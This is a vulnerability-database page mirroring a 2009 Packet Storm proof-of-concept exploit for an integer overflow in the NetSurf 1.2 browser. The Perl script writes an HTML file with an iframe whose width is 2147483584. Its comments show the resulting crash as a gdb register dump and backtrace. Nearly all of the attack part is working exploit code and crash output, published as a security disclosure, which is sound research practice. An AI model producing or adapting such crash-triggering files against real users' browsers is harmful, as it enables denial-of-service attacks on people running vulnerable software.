Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NetSurf 1.2 width Integer Overflow Proof Of Concept

🗓️ 15 Jan 2009 00:00:00Reported by Jeremy BrownType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Netsurf 1.2 'width' Remote Integer Overflow PoC Exploi

Code
`#!/usr/bin/perl  
# netsurf_width_intof2.pl  
# Netsurf 1.2 'width' Remote Integer Overflow PoC Exploit  
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]  
#   
# Program received signal SIGABRT, Aborted.  
# [Switching to Thread 0xb6d78720 (LWP 28933)]  
# 0xb804e430 in __kernel_vsyscall ()  
# (gdb) i r  
# eax 0x0 0  
# ecx 0x7105 28933  
# edx 0x6 6  
# ebx 0x7105 28933  
# esp 0xbfb4cfe4 0xbfb4cfe4  
# ebp 0xbfb4cffc 0xbfb4cffc  
# esi 0xb7532b97 -1219286121  
# edi 0xb754fff4 -1219166220  
# eip 0xb804e430 0xb804e430 <__kernel_vsyscall+16>  
# eflags 0x206 [ PF IF ]  
# cs 0x73 115  
# ss 0x7b 123  
# ds 0x7b 123  
# es 0x7b 123  
# fs 0x0 0  
# gs 0x33 51  
# (gdb) bt  
# 0 0xb804e430 in __kernel_vsyscall ()  
# 1 0xb7421880 in raise () from /lib/tls/i686/cmov/libc.so.6  
# 2 0xb7423248 in abort () from /lib/tls/i686/cmov/libc.so.6  
# 3 0xb741a72e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6  
# 4 0x080a7cdd in ?? ()  
# 5 0x080a75e2 in ?? ()  
# 6 0x080a747d in ?? ()  
# 7 0x080ab3f0 in layout_document ()  
# 8 0x0809f073 in html_reformat ()  
# 9 0x080a0d95 in html_convert ()  
# 10 0x0805980c in content_convert ()  
# 11 0x0805cc49 in ?? ()  
# 12 0x0805a6c1 in fetch_send_callback ()  
# 13 0x08060c23 in ?? ()  
# 14 0x0806110f in ?? ()  
# 15 0x0805afe9 in fetch_poll ()  
# 16 0x08088276 in gui_poll ()  
# 17 0x0807fe94 in main ()  
#   
# Adv Ref: netsurf_multiple_adv.txt  
  
$filename = $ARGV[0];  
if(!defined($filename))  
{  
  
print "Usage: $0 <filename.html>\n";  
  
}  
  
$head = "<html>" . "\n";  
$trig = "<iframe src=\"test.jpg\" width=\"2147483584\">" . "\n";  
#$trig = "<hr width=\"2147483584\">" . "\n";  
$foot = "</html>";  
  
$data = $head . $trig . $foot;  
  
open(FILE, '>' . $filename);  
print FILE $data;  
close(FILE);  
  
exit;`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Jan 2009 00:00Current
0.8Low risk
Vulners AI Score0.8
netsurf 1.2remote integer overflowexploittest.jpghtmlfilenameproof of concept
23